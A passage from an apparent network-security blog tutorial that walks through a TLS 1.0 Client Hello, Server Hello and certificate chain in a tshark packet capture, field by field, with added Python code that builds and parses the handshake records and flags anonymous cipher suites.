</div><div><br /></div><div><div>Reviewing the PCAP file.</div><div><br /></div><div>As TLS runs above TCP (in this example), first we see the TCP 3-way handshake.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -c 3</span>
<span style="color: white;"> 1 0.000000 10.0.1.128 → 142.251.32.83 TCP 74 41570 → 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=971727410 TSecr=0 WS=128</span>
<span style="color: white;"> 2 0.014645 142.251.32.83 → 10.0.1.128 TCP 60 443 → 41570 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460</span>
<span style="color: white;"> 3 0.014733 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0</span>
</pre></div>
</div><div><br /></div><div>Next packet to come is the "<i>Client Hello</i>"</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">4 0.019859 10.0.1.128 → 142.251.32.83 TLSv1 236 Client Hello</span>
</pre></div>
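<p>Before breaking that Client Hello down with <i>tshark</i>, it helps to see how the bytes are framed: a 5-byte record header (content type, version, length) in front of a 4-byte handshake header and then the Client Hello body. The Python below is an added example, not code from the original post or from tshark. It builds a record carrying the field values the tshark decode of this capture shows (TLS 1.0, the 32-byte random, the 27 cipher suites in order, null compression, 78 bytes of extensions) and parses it back with length checks at every step. The extension bytes are constructed (an SNI for www.securitynik.com plus a padding extension) because the capture's own extension contents are not shown; the set of anonymous suites it flags is taken from the "_anon_" names in that decode.</p>

```python
"""Parse a TLSv1.0 record carrying a Client Hello (framing per RFC 2246, sections 6.2 and 7.4.1.2).

Added example, not code from the original post or from tshark. Field values are
those the tshark decode of this capture shows; the extension bytes are constructed.
"""
import struct

CLIENT_RANDOM = bytes.fromhex(
    "d21450dca6d7d0a53270853149ffa3bd2e6004eecaa7a50666386b6ccc26c817")
CIPHER_SUITES = [  # the 27 suites, in the order the client offered them
    0xC00A, 0xC014, 0x0039, 0x0038, 0x0088, 0x0087, 0xC019, 0x003A, 0x0089,
    0xC009, 0xC013, 0x0033, 0x0032, 0x009A, 0x0099, 0x0045, 0x0044, 0xC018,
    0x0034, 0x009B, 0x0046, 0x0035, 0x0084, 0x002F, 0x0096, 0x0041, 0x00FF,
]
ANON_SUITES = {0xC019, 0x003A, 0x0089, 0xC018, 0x0034, 0x009B, 0x0046}  # "_anon_" names in the decode
SCSV = 0x00FF                     # TLS_EMPTY_RENEGOTIATION_INFO_SCSV: a signal, not a cipher
HANDSHAKE, CLIENT_HELLO = 22, 1   # record content type / handshake message type
SNI_EXT, PADDING_EXT = 0x0000, 0x0015


def _ext(ext_type: int, body: bytes) -> bytes:
    return struct.pack("!HH", ext_type, len(body)) + body


def build_client_hello() -> bytes:
    """Constructed record with the capture's field values; extensions are constructed (SNI + padding)."""
    host = b"www.securitynik.com"
    sni_entry = struct.pack("!BH", 0, len(host)) + host                   # 22 bytes
    exts = _ext(SNI_EXT, struct.pack("!H", len(sni_entry)) + sni_entry)   # 28 bytes
    exts += _ext(PADDING_EXT, bytes(46))                                  # 50 bytes, 78 in total
    suites = b"".join(struct.pack("!H", s) for s in CIPHER_SUITES)        # 54 bytes
    body = (b"\x03\x01" + CLIENT_RANDOM + b"\x00"          # version, random, empty session ID
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00"                                  # one compression method: null
            + struct.pack("!H", len(exts)) + exts)         # 173 bytes of Client Hello
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body   # 177 bytes
    return bytes([HANDSHAKE, 3, 1]) + struct.pack("!H", len(handshake)) + handshake


def parse_record(data: bytes) -> dict:
    """Record layer: content type (1), version (2), length (2), then the fragment."""
    if len(data) < 5:
        raise ValueError("short record header")
    content_type, major, minor, length = struct.unpack("!BBBH", data[:5])
    fragment = data[5:5 + length]
    if len(fragment) != length:
        raise ValueError("truncated record")
    return {"content_type": content_type, "version": (major, minor),
            "length": length, "fragment": fragment}


def parse_client_hello(fragment: bytes) -> dict:
    """Handshake layer: type (1), length (3), then the Client Hello body."""
    hs_type, hs_len = fragment[0], int.from_bytes(fragment[1:4], "big")
    if hs_type != CLIENT_HELLO or len(fragment) < 4 + hs_len:
        raise ValueError("not a complete Client Hello")
    body, pos = fragment[4:4 + hs_len], 0

    def take(n: int) -> bytes:  # read n bytes and advance; every declared length is checked
        nonlocal pos
        chunk = body[pos:pos + n]
        if len(chunk) != n:
            raise ValueError("truncated Client Hello")
        pos += n
        return chunk

    version = tuple(take(2))
    random = take(32)
    session_id = take(take(1)[0])
    raw_suites = take(struct.unpack("!H", take(2))[0])
    suites = [struct.unpack("!H", raw_suites[i:i + 2])[0] for i in range(0, len(raw_suites), 2)]
    compression = list(take(take(1)[0]))
    ext_len = struct.unpack("!H", take(2))[0]
    extensions, end = [], pos + ext_len
    while pos < end:
        ext_type, ext_body_len = struct.unpack("!HH", take(4))
        extensions.append((ext_type, take(ext_body_len)))
    if pos != end or pos != hs_len:
        raise ValueError("extension lengths do not add up")
    server_name = None
    for ext_type, ext_body in extensions:  # SNI body: list length (2), name type (1), name length (2), name
        if ext_type == SNI_EXT:
            server_name = ext_body[5:5 + struct.unpack("!H", ext_body[3:5])[0]].decode("ascii")
    return {"length": hs_len, "version": version, "random": random,
            "gmt_unix_time": int.from_bytes(random[:4], "big"), "session_id": session_id,
            "cipher_suites": suites, "compression_methods": compression,
            "extensions_length": ext_len, "extensions": extensions, "server_name": server_name}


def anonymous_suites(suites: list) -> list:
    """Offered suites that do no server authentication; a server picking one needs no certificate."""
    return [s for s in suites if s in ANON_SUITES]
```

<p>As a sanity check against the capture: 5 bytes of record header plus the 177-byte fragment give 182 bytes, which with 54 bytes of Ethernet, IP and TCP headers matches the 236-byte frame tshark reports for packet 4. The anonymous suites are the item a reviewer should notice in a client's offer: they allow a session with no server authentication at all if the far end selects one.</p>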
</div><div><br /></div><div><div>Breaking the "<i>Client Hello</i>" down (well, some of it). </div><div>The hello messages are used to exchange security capabilities and enhancements between the client and server. The client's hello message must be answered by the server's hello message; if there is no response, the connection fails. Between them, the client and server hello messages establish the protocol version, session ID, cipher suite and compression method to be used: the client offers its lists, in order of preference, and the server picks one entry from each. </div><div><br /></div><div>While the client normally will first send its hello as shown above, in TLSv1.0 the server may send a "<i>Hello Request</i>" asking the client to begin the negotiation process anew.</div><div><br /></div><div>Both the client and server also generate their respective random values, <i>ClientHello.random </i>and <i>ServerHello.random</i>, which later feed into the key derivation. The "GMT Unix Time" of 2081 in the decode below is not a clock error: current implementations fill all 32 bytes of the random with random data rather than putting a timestamp in the first four.</div><div><br /></div><div>While there is a lot in there, we are going to focus on the most important items at this time, for the purpose of this conversation. One item worth noticing in the list below is that this client also offers <i>DH_anon</i> and <i>ECDH_anon</i> suites, which perform no server authentication; offering them means the protocol itself would let a server (or an attacker in the path) negotiate a session without presenting a certificate, and it is then up to the client application to refuse.</div><div><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "tls.handshake.type == 1" -V | sed '1,81d;128,$d' </span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Client Hello</span>
<span style="color: white;"> 1: Content Type: Handshake (22)</span>
<span style="color: white;"> 2: Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> 3: Length: 177</span>
<span style="color: white;"> Handshake Protocol: Client Hello</span>
<span style="color: white;"> 4: Handshake Type: Client Hello (1)</span>
<span style="color: white;"> 5: Length: 173</span>
<span style="color: white;"> 6: Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Random: d21450dca6d7d0a53270853149ffa3bd2e6004eecaa7a50666386b6ccc26c817</span>
<span style="color: white;"> 7: GMT Unix Time: Sep 8, 2081 04:46:20.000000000 EDT</span>
<span style="color: white;"> 8: Random Bytes: a6d7d0a53270853149ffa3bd2e6004eecaa7a50666386b6ccc26c817</span>
<span style="color: white;"> 9: Session ID Length: 0</span>
<span style="color: white;"> 10: Cipher Suites Length: 54</span>
<span style="color: white;"> 11: Cipher Suites (27 suites)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0088)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA (0x0087)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDH_anon_WITH_AES_256_CBC_SHA (0xc019)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_AES_256_CBC_SHA (0x003a)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA (0x0089)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (0xc009)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA (0x009a)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_SEED_CBC_SHA (0x0099)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0045)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA (0x0044)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDH_anon_WITH_AES_128_CBC_SHA (0xc018)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA (0x0034)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_SEED_CBC_SHA (0x009b)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA (0x0046)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0084)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_SEED_CBC_SHA (0x0096)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0041)</span>
<span style="color: white;"> Cipher Suite: TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0x00ff)</span>
<span style="color: white;"> 12: Compression Methods Length: 1</span>
<span style="color: white;"> 13: Compression Methods (1 method)</span>
<span style="color: white;"> 14: Compression Method: null (0)</span>
<span style="color: white;"> 15: Extensions Length: 78</span>
</pre></div>
</div><div><br /></div><div><div>1: Content Type: Because TLS was designed to allow extensions to the protocol, new content types can be added. If a TLS 1.0 implementation receives a record type it does not understand, it should ignore it (RFC 2246); TLS 1.2 tightened this to a fatal <i>unexpected_message</i> alert. </div><div><br /></div><div>Four content types are defined by default: </div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Handshake Protocol (22)</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Alert Protocol (21)</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Change Cipher Spec Protocol (20)</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Application Data Protocol (23)</span></div><div><br /></div><div>2: Version: For TLSv1.0 the record layer version shows ... well ... TLS 1.0. The value in brackets, 0x0301, is major version 3, minor version 1: TLS 1.0 is a minor modification of SSL 3.0 (0x0300) and is numbered as SSL 3.1 on the wire.</div><div><br /></div><div>3: Length: The number of bytes that follow the 5-byte record header, here the 177-byte handshake message. A record fragment must not exceed 2**14 bytes.</div><div><br /></div><div>4: Handshake Type: Client Hello (1): There are various handshake types: hello_request (0), client_hello (1), server_hello (2), certificate (11), server_key_exchange (12), certificate_request (13), server_hello_done (14), certificate_verify (15), client_key_exchange (16) and finished (20). These numbers are what the <i>tls.handshake.type</i> filter matches on.</div><div><br /></div><div>Above, we see the type is Client Hello.</div><div><br /></div><div>5: Length: 173: The handshake message body is 173 bytes. Add the 4-byte handshake header (1 byte of type, 3 bytes of length) and you get the 177 bytes of bullet 3.</div><div><br /></div><div>6: Version: TLS 1.0 (0x0301): The highest protocol version the client is willing to use; the server may select a lower one in its Server Hello. This shows TLS 1.0 being requested. (In a TLS 1.3 Client Hello this field is frozen at 0x0303 and the versions actually offered live in the <i>supported_versions</i> extension.)</div><div><br /></div><div>7: GMT Unix Time: The first 4 bytes of the 32-byte Random, meant to hold the current time in seconds since January 1, 1970 according to the client's clock. Interestingly, clocks are not required to be set correctly, and many modern clients fill all 32 bytes randomly (TLS 1.3 dropped the timestamp altogether). 
Well, that is good to know. If you look closely above, it says Sep 8, 2081, so do not treat this field as evidence of when the capture was taken.</div><div><br /></div><div>8: Random Bytes: The remaining 28 bytes, generated by a secure random number generator. Together with the server's random this is fed into the master secret derivation.</div><div><br /></div><div>9: Session ID Length: 0 here. When non-zero, the session ID identifies an earlier session whose security parameters the client wishes to reuse, so that several connections can be set up without repeating the full handshake. That earlier session may be from a previous connection or from another one that is still active. A length of 0, as above, means the client is starting a new session.</div><div><br /></div><div>10: Cipher Suites Length: The number of bytes occupied by the cipher suite list the client sends to the server. Each suite is 2 bytes, so 27 suites give the 54 we see.</div><div><br /></div><div>11: Cipher Suites: We see 27 entries passed by the client, in the client's order of preference. Meaning "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a)" is what the client wishes to use first. A suite name defines the key exchange algorithm (ECDHE), the authentication algorithm (ECDSA), the bulk encryption algorithm including key length and mode (AES_256_CBC) and the MAC algorithm (SHA, meaning HMAC-SHA1 in TLS 1.0). The server chooses one from the list, and nothing obliges it to honour the client's order. If no acceptable cipher suite is found, the server sends a handshake_failure alert and the connection is closed. Two things are worth noticing in this list from a security point of view. The last entry, TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0x00ff), is not a cipher suite at all but a signalling value telling the server the client supports secure renegotiation (RFC 5746). And seven of the entries are DH_anon/ECDH_anon suites, which perform no server authentication; a client that offers those can be handed a certificate-free connection by anyone in the path, so their presence in a Client Hello is worth flagging.</div><div><br /></div><div>12: Compression Methods Length: The number of bytes occupied by the compression methods. In this case, 1 byte.</div><div><br /></div><div>13: Compression Methods (1 method): How many compression methods are offered. </div><div><br /></div><div>14: Compression Method: Only the null method (0) is offered, so no compression. 
If there were multiple, like the cipher suites, they would be placed in order of preference. TLS-level compression is something you want to see absent: DEFLATE (RFC 3749) is what the CRIME attack exploited to recover secrets such as cookies, and TLS 1.3 removed compression altogether.</div><div><br /></div><div>15: Extensions Length: I will not go through the extensions at this time. Note, though, that 78 is the number of bytes the extensions occupy, not a count of extensions; each extension is a 2-byte type, a 2-byte length and its data.</div><div><br /></div><div>With that understanding of the key fields within the TLS Client Hello, let's look now at the Server Hello.</div><div><br /></div><div>For the Client Hello, our tshark filter was "<i>tls.handshake.type == 1</i>"; for the Server Hello, the handshake type is 2.</div></div><div><br /></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "tls.handshake.type == 2" -V | sed '1,82d;100,$d' </span>
<span style="color: white;">Transport Layer Security </span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Server Hello </span>
<span style="color: white;"> 1: Content Type: Handshake(22) </span>
<span style="color: white;"> 2: Version: TLS 1.0 (0x0301) </span>
<span style="color: white;"> Length: 100</span>
<span style="color: white;"> Handshake Protocol: Server Hello</span>
<span style="color: white;"> 3: Handshake Type: Server Hello (2)</span>
<span style="color: white;"> Length: 96</span>
<span style="color: white;"> 4: Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Random: 64b57bddd6dd95316e80d2d04a66ffcebb3f853e885b61d4444f574e47524400</span>
<span style="color: white;"> 5: GMT Unix Time: Jul 17, 2023 13:35:25.000000000 EDT</span>
<span style="color: white;"> 6: Random Bytes: d6dd95316e80d2d04a66ffcebb3f853e885b61d4444f574e47524400</span>
<span style="color: white;"> 7: Session ID Length: 32</span>
<span style="color: white;"> 8: Session ID: f943d4e522980ff86ab6371b4bd77e9dbe71cf3dbd939c54d17c08c6710a783d</span>
<span style="color: white;"> 9: Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)</span>
<span style="color: white;"> 10: Compression Method: null (0)</span>
<span style="color: white;"> 11: Extensions Length: 24</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
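<p>To make the byte accounting in the two dumps above concrete (record length is the handshake length plus the 4-byte handshake header, the cipher suites length is 2 bytes per suite, and the extensions length is a byte count), here is an added Python example that builds and parses ClientHello and ServerHello records. It is not code from the original post or from tshark. The cipher suites, randoms and session ID are copied from the dumps above; the extension sets are constructed so that their lengths (78 and 24 bytes) line up with the dumps, since the capture's actual extensions are not listed on the page. The TLS 1.3 style hello at the end goes beyond the capture to show where that version hides its real version number.</p>

```python
"""Build and parse TLS ClientHello / ServerHello records. Added example for this post,
not the page's or tshark's code. Randoms, session ID and cipher suites are copied from
the dumps above; the extension sets are constructed here to match the dumps' lengths."""
import struct

CLIENT_SUITES = [0xc00a, 0xc014, 0x0039, 0x0038, 0x0088, 0x0087, 0xc019, 0x003a, 0x0089,
                 0xc009, 0xc013, 0x0033, 0x0032, 0x009a, 0x0099, 0x0045, 0x0044, 0xc018,
                 0x0034, 0x009b, 0x0046, 0x0035, 0x0084, 0x002f, 0x0096, 0x0041, 0x00ff]
ANON_SUITES = {0xc019, 0x003a, 0x0089, 0xc018, 0x0034, 0x009b, 0x0046}  # DH_anon/ECDH_anon: no server auth
SCSV = 0x00ff  # TLS_EMPTY_RENEGOTIATION_INFO_SCSV: a signalling value, not a cipher suite
CLIENT_RANDOM = bytes.fromhex("d21450dca6d7d0a53270853149ffa3bd2e6004eecaa7a50666386b6ccc26c817")
SERVER_RANDOM = bytes.fromhex("64b57bddd6dd95316e80d2d04a66ffcebb3f853e885b61d4444f574e47524400")
SESSION_ID = bytes.fromhex("f943d4e522980ff86ab6371b4bd77e9dbe71cf3dbd939c54d17c08c6710a783d")

def ext(etype, data):  # one extension: 2-byte type, 2-byte length, data
    return struct.pack("!HH", etype, len(data)) + data

def ext_u16_list(etype, values, len_bytes=2):  # extensions whose body is a length-prefixed list of u16
    lst = b"".join(struct.pack("!H", v) for v in values)
    return ext(etype, len(lst).to_bytes(len_bytes, "big") + lst)

def handshake_record(hs_type, body, record_version):
    hs = bytes([hs_type]) + len(body).to_bytes(3, "big") + body  # 4-byte handshake header
    return b"\x16" + struct.pack("!HH", record_version, len(hs)) + hs  # 5-byte record header

def build_client_hello(version, random, suites, extensions, record_version=0x0301):
    body = struct.pack("!H", version) + random + b"\x00"  # version, 32-byte random, empty session ID
    body += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00" + struct.pack("!H", len(extensions)) + extensions  # one method (null), extensions
    return handshake_record(1, body, record_version)

def build_server_hello(version, random, session_id, suite, extensions):
    body = struct.pack("!H", version) + random + bytes([len(session_id)]) + session_id
    body += struct.pack("!HB", suite, 0) + struct.pack("!H", len(extensions)) + extensions
    return handshake_record(2, body, version)

def parse_hello(rec):
    """Walk record header, handshake header and hello body; returns the fields tshark labels above."""
    ctype, rec_version, rec_len = struct.unpack("!BHH", rec[:5])
    if ctype != 22 or rec_len > 2 ** 14 or 5 + rec_len > len(rec):
        raise ValueError("not a well-formed handshake record")
    hs = rec[5:5 + rec_len]
    hs_type, hs_len = hs[0], int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + hs_len]
    if len(body) != hs_len:
        raise ValueError("truncated handshake message")
    h = {"record_version": rec_version, "record_length": rec_len, "handshake_type": hs_type,
         "handshake_length": hs_len, "version": struct.unpack("!H", body[:2])[0],
         "random": body[2:34], "gmt_unix_time": int.from_bytes(body[2:6], "big")}
    sid_len, pos = body[34], 35
    h["session_id"], pos = body[pos:pos + sid_len], pos + sid_len
    if hs_type == 1:
        cs_len, pos = struct.unpack("!H", body[pos:pos + 2])[0], pos + 2
        h["cipher_suites_length"] = cs_len  # bytes, i.e. 2 x number of suites
        h["cipher_suites"] = [int.from_bytes(body[i:i + 2], "big") for i in range(pos, pos + cs_len, 2)]
        cm_len, pos = body[pos + cs_len], pos + cs_len + 1
        h["compression_methods"], pos = list(body[pos:pos + cm_len]), pos + cm_len
    elif hs_type == 2:
        h["cipher_suite"], h["compression_method"] = struct.unpack("!HB", body[pos:pos + 3])
        pos += 3
    else:
        raise ValueError("handshake type %d is not a hello" % hs_type)
    h["extensions"] = []
    if pos < len(body):  # the extensions block is optional before TLS 1.3
        ext_len, pos = struct.unpack("!H", body[pos:pos + 2])[0], pos + 2
        h["extensions_length"], end = ext_len, pos + ext_len  # bytes, not a count
        while pos < end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            h["extensions"].append((etype, body[pos + 4:pos + 4 + elen]))
            pos += 4 + elen
        if pos != end or end > len(body):
            raise ValueError("extension lengths do not add up")
    return h

def summarize(h):
    """What an analyst wants from a hello: versions really offered, unauthenticated suites, SCSV."""
    versions = [h["version"]]
    for etype, data in h["extensions"]:
        if etype == 43 and h["handshake_type"] == 1:  # supported_versions: 1-byte length, 2-byte entries
            versions = [int.from_bytes(data[i:i + 2], "big") for i in range(1, 1 + data[0], 2)]
    suites = h.get("cipher_suites", [h.get("cipher_suite")])
    return {"offered_versions": versions, "anonymous_suites": [s for s in suites if s in ANON_SUITES],
            "has_renegotiation_scsv": SCSV in suites, "extension_types": [t for t, _ in h["extensions"]]}

# Constructed extension sets of 78 and 24 bytes, the sizes in the dumps (the capture's real ones are not shown)
CLIENT_EXTS = (ext(0, b"\x00\x16" + b"\x00" + b"\x00\x13" + b"www.securitynik.com")  # server_name (SNI)
               + ext_u16_list(10, [0x001d, 0x0017, 0x0018]) + ext(11, b"\x01\x00")
               + ext_u16_list(13, [0x0401, 0x0501, 0x0601, 0x0403]) + ext(0xff01, b"\x00")
               + ext(18, b"") + ext(5, b"\x01\x00\x00\x00\x00"))
SERVER_EXTS = ext(16, b"\x00\x03\x02h2") + ext(0xff01, b"\x00") + ext(11, b"\x01\x00") + ext(23, b"")
CLIENT_HELLO = build_client_hello(0x0301, CLIENT_RANDOM, CLIENT_SUITES, CLIENT_EXTS)
SERVER_HELLO = build_server_hello(0x0301, SERVER_RANDOM, SESSION_ID, 0xc013, SERVER_EXTS)
# TLS 1.3 style hello: 0x0303 on the wire, the versions actually offered live in supported_versions (43)
TLS13_HELLO = build_client_hello(0x0303, CLIENT_RANDOM, [0x1302, 0x1301, 0x1303],
                                 ext_u16_list(43, [0x0304, 0x0303], len_bytes=1))
```

<p>Parsing CLIENT_HELLO gives record length 177, handshake length 173, cipher suites length 54 for 27 entries and extensions length 78; SERVER_HELLO gives 100, 96, a 32-byte session ID and suite 0xc013, exactly the numbers tshark printed. The <i>summarize</i> view is the part to keep around: for a detection, the versions a client actually offers and whether it offers anonymous suites matter more than the version byte at the top of the record, which in TLS 1.3 no longer means what it says.</p>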
<p></p><p>The server responds to a "<i>Client Hello</i>" with a "<i>Server Hello</i>", assuming it finds an acceptable set of algorithms.</p><p>Bullets 1 and 2 are the record layer fields already discussed for the Client Hello. No need to repeat them here. </p><p>Starting from bullet 3.</p><p>3: Handshake Type: We see handshake type 2, which is the Server Hello. The record Length of 100 and the handshake Length of 96 again differ by the 4-byte handshake header.</p><p>4: Version: TLS 1.0 (0x0301). This is the version the server selected: the highest it supports that does not exceed what the client offered. If a downgrade happens, this is the field it shows up in.</p><p>5: GMT Unix Time: The same 4-byte field as in the Client Hello, but according to the server's clock. Unlike the client, this server filled it in, so we do see the true date and time the negotiation took place from the server's perspective: Jul 17, 2023.</p><p>6: Random Bytes: Generated by the server and must be different from, and independent of, ClientHello.random.</p><p>7: Session ID Length: The session ID that follows is 32 bytes long.</p><p>8: Session ID: If the client had asked to resume an existing session and the server were willing, the Session ID from the Client Hello would be echoed here. However, above, we saw the Client Hello sent an empty Session ID (length 0). As a result, the value in this field is a new Session ID the client can present later to resume this session. It is also possible for the server to respond with an empty Session ID, meaning this session will not be cached and thus cannot be resumed.</p><p>9: Cipher Suite: Whereas the Client Hello carried 27 entries, the Server Hello carries exactly one: the suite the server chose from the client's list. If the session were resumed, this would be the suite of the resumed session. The choice made here is TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013), the client's eleventh preference, not its first (0xc00a). That is normal: the server cannot pick an ECDSA suite with an RSA certificate, and a server configured with its own preference order applies that rather than the client's. Checking which suite was picked, not which were offered, is how you tell what protection the connection actually has.</p><p>10: Compression Method: null (0). No compression is being used here.</p><p>11: Extensions Length: 24. As with the Client Hello, this is 24 bytes of extensions, not 24 extensions, and like the Client Hello extensions we are not going to cover them here. 
</p><p>Looking at handshake type 11 - Server Certificate.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Certificate</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 4212</span>
<span style="color: white;"> Handshake Protocol: Certificate</span>
<span style="color: white;"> Handshake Type: Certificate (11)</span>
<span style="color: white;"> Length: 4208</span>
<span style="color: white;"> Certificates Length: 4205</span>
<span style="color: white;"> Certificates (4205 bytes)</span>
<span style="color: white;"> Certificate Length: 1390</span>
<span><span style="color: white;"> Certificate: 3082056a30820452a003020102021061e289d6689c9871120ac9bfb26a5e67300d06092a… (id-at-commonName=</span><b><span style="color: #fcff01;">www.securitynik.com</span></b><span style="color: white;">)</span></span>
<span style="color: white;"> signedCertificate</span>
<span style="color: white;"> version: v3 (2)</span>
<span style="color: white;"> serialNumber: 0x61e289d6689c9871120ac9bfb26a5e67</span>
<span style="color: white;"> signature (sha256WithRSAEncryption)</span>
<span style="color: white;"> ....</span>
<span style="color: white;"> Certificate Length: 1424</span>
<span><span style="color: white;"> Certificate: 3082058c30820374a003020102020d02008eb2023336658b64cddb9b300d06092a864886… (id-at-commonName=</span><b><span style="color: #fcff01;">GTS CA 1D4</span></b><span style="color: white;">,id-at-organizationName=Google Trust Services LLC,id-at-countryName=US)</span></span>
<span style="color: white;"> signedCertificate</span>
<span style="color: white;"> version: v3 (2)</span>
<span style="color: white;"> serialNumber: 0x02008eb2023336658b64cddb9b</span>
<span style="color: white;"> signature (sha256WithRSAEncryption)</span>
<span style="color: white;"> ....</span>
<span style="color: white;"> Certificate Length: 1382</span>
<span><span style="color: white;"> Certificate: 308205623082044aa003020102021077bd0d6cdb36f91aea210fc4f058d30d300d06092a… (id-at-commonName=</span><b><span style="color: #fcff01;">GTS Root R1</span></b><span style="color: white;">,id-at-organizationName=Google Trust Services LLC,id-at-countryName=US)</span></span>
<span style="color: white;"> signedCertificate</span>
<span style="color: white;"> version: v3 (2)</span>
<span style="color: white;"> serialNumber: 0x77bd0d6cdb36f91aea210fc4f058d30d</span>
<span style="color: white;"> signature (sha256WithRSAEncryption)</span>
<span style="color: white;"> ....</span>
</pre></div>
